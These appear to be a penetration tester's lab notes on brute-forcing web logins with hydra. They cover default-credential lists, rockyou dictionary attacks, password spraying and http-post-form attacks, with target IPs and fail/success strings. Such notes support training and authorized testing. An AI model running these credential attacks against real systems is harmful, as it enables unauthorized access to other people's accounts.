Web login

Always start with Default Credentials

Wordlists

Default CredentialsPassword listsUsername lists

Basic authentification

Default credz

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt  178.211.23.155 -s 31099 http-get /

Options	Description
-C ftp-betterdefaultpasslist.txt	Combined Credentials Wordlist
SERVER_IP	Target IP
-s PORT	Target Port
http-get	Request Method
/	Target Path

Dictionnary attack

hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 178.35.49.134 -s 32901 http-get /

Password Spraying

hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -p amormio -u -f 178.35.49.134 -s 32901 http-get /

Login page

With Error Message

hydra http-post-form -U

<...SNIP...>
Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables ...SNIP... usernames and passwords being replaced in the
 "^USER^" and "^PASS^" placeholders
The third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".

<...SNIP...>

Examples:
 "/login.php:user=^USER^&pass=^PASS^:incorrect"

Example

hydra -l admin -P /usr/share/wordlists/rockyou.txt -f inlanefreight.local  http-post-form "/monitoring/login.php:username=^USER^&password=^PASS^:Invalid"

No error messages

/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:[FAIL/SUCCESS]=[success/failed string]

Type	Boolean Value	Flag
Fail	FALSE	F=html_content
Success	TRUE	S=html_content

hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 83.136.251.226 -s 57876 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"